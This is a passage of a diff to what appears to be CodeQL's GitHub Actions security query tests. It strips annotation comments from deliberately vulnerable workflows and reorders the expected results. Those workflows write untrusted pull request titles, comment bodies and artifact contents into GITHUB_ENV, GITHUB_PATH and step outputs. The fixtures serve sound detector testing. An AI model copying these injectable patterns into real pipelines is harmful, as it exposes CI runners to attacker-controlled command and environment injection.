$GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | @@ -31,3 +22,12 @@ nodes | .github/workflows/output2.yml:53:14:56:19 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | | .github/workflows/output2.yml:58:14:62:48 | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | subpaths +#select +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml index 0a19c76c769a..e4845a6f2f16 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -12,14 +12,14 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip # $ Source[actions/envvar-injection/critical] + - name: Unzip run: | unzip artifact_name.zip -d foo - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" cat foo >> "$GITHUB_ENV" - echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] + echo "EOF" >> "${GITHUB_ENV}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml index c157d791f396..67209267b5c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -12,7 +12,7 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip # $ Source[actions/envvar-injection/critical] + - name: Unzip run: | unzip artifact_name.zip -d foo - run: | @@ -20,7 +20,7 @@ jobs: echo 'JSON_RESPONSE<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml index c071d54236d7..d22f09c03bdb 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -10,23 +10,23 @@ jobs: - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo $(echo "$PATHINJ") >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo $PATHINJ >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo $PATHINJ >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo ${PATHINJ} >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo ${PATHINJ} >> $GITHUB_PATH - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name path: foo - - run: echo "$(cat foo/bar)" >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] Source[actions/envpath-injection/critical] + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH - env: ACTIONS_ALLOW_UNSECURE_COMMANDS: true - PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] - run: echo "::add-path::$PATHINJ" # $ Alert[actions/envpath-injection/critical] + PATHINJ: ${{ github.event.pull_request.title }} + run: echo "::add-path::$PATHINJ" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml index 0811e61cfc65..f43a12cb42a3 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -23,6 +23,6 @@ jobs: ref: ${{steps.decide-ref.outputs.ref}} path: "foo" - - name: Read Java Config # $ Source[actions/envvar-injection/critical] - run: cat foo/.github/java-config.env >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + - name: Read Java Config + run: cat foo/.github/java-config.env >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 58e0f2edf9c2..5edd526d8201 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -18,11 +18,11 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] + - name: "Put runtime versions on the environment" id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml index 097e3a09a114..3a0c4cc91b82 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -43,14 +43,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] + - name: "Put runtime versions on the environment" id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" - name: "Download pre-release report" uses: dawidd6/action-download-artifact@v2 @@ -58,14 +58,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: prerelease-report.md - - name: "Put pre-release report on the environment" # $ Source[actions/envvar-injection/critical] + - name: "Put pre-release report on the environment" id: prerelease_report run: | { echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" - name: "Comment on PR with Wrangler link" uses: marocchino/sticky-pull-request-comment@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml index 278cea70f19a..78d288fb9822 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -17,7 +17,7 @@ jobs: - name: Get commit message run: | COMMIT_MESSAGE=$(git log --format=%s) - echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV - name: Get commit message run: | - echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml index 5b9bd4e278c7..93854c5e889f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -12,7 +12,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" - run: echo "${{ env.CHANGED-FILES }}" test2: runs-on: ubuntu-latest @@ -23,7 +23,7 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml index 85d6109cd492..89ecd8c0ec3e 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -9,7 +9,7 @@ jobs: steps: - id: title run: | - echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" - run: echo "$TITLE" test2: runs-on: ubuntu-latest @@ -17,7 +17,7 @@ jobs: - id: title run: | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) - echo "BODY=$PR_BODY" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" - run: echo "$TITLE" test3: runs-on: ubuntu-latest diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml index 87a02ca5a1d9..efcfda0e4c76 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -12,12 +12,12 @@ jobs: with: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr_metadata - - run: | # $ Source[actions/envvar-injection/critical] + - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV - run: | # NOT VULNERABLE echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index de66e4cf253f..c902b7e61bd2 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -38,6 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - - run: | # $ Source[actions/envvar-injection/critical] + - run: | unzip pr.zip - echo "pr_number=$(cat NR)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "pr_number=$(cat NR)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index 5059ee9d0da3..f76454c6088f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -17,7 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - run: | # $ Source[actions/envvar-injection/critical] + - run: | echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV - echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index f4c6ebcb5b3c..7b30ec8b7e42 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -8,43 +8,43 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | - echo "PR_TITLE=$TITLE" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | - echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | - echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | echo "PR_TITLE<> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV - echo "EOF" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "EOF" >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" echo "$TITLE" >> "${GITHUB_ENV}" - echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] + echo "EOF" >> "${GITHUB_ENV}" - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] + } >> "$GITHUB_ENV" - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | cat <<-EOF >> "$GITHUB_ENV" FOO=$TITLE - EOF # $ Alert[actions/envvar-injection/critical] + EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | @@ -52,12 +52,12 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.head_ref }} - - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: - TARGET_BRANCH: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] - - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} - env: TITLE: |- ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml index cdcc49bde91f..cfc5e6ef1fa5 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -27,10 +27,10 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' # $ Source[actions/envvar-injection/critical] + - name: 'Unzip code coverage' run: unzip oc-code-coverage.zip -d coverage - name: set env vars run: | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml index 076941d4aece..36340258515e 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -8,20 +8,20 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | FOO=${TITLE##*/} - echo PR_TITLE=${FOO} >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo PR_TITLE=${FOO} >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | FOO=$TITLE+ - echo PR_TITLE=$FOO >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo PR_TITLE=$FOO >> $GITHUB_ENV - env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: | venv="$(echo $TITLE)')" - echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml index f9e0ea8a3245..c33c90dbb9c6 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -13,7 +13,7 @@ jobs: run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Load .env file # $ Source[actions/envvar-injection/critical] + - name: Load .env file uses: aarcangeli/load-dotenv@v1.0.0 with: path: 'backend/new' @@ -21,5 +21,5 @@ jobs: .env .env.test quiet: false - if-file-not-found: error # $ Alert[actions/envvar-injection/critical] + if-file-not-found: error diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index c84dcae914ca..806f8dc8e45c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -27,13 +27,13 @@ jobs: run_id: ${{ github.event.workflow_run.id }} path: ./artifacts - - name: assignment # $ Source[actions/envvar-injection/critical] + - name: assignment run: | foo=$(cat ./artifacts/parent-artifacts/event.txt) - echo "foo=$foo" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "foo=$foo" >> $GITHUB_ENV - name: direct 1 run: | - echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV - name: direct 2 run: | - echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml index 6f7d3b9cffcf..3ed80374ef65 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -24,7 +24,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number # $ Source[actions/envvar-injection/critical] + - name: Try to read PR number id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -38,4 +38,4 @@ jobs: fi echo "pr_num=$pr_num" >> $GITHUB_ENV - echo "ref=$ref" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] + echo "ref=$ref" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 398a80131733..f544994fc5c1 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,9 +1,3 @@ -#select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -22,3 +16,9 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | 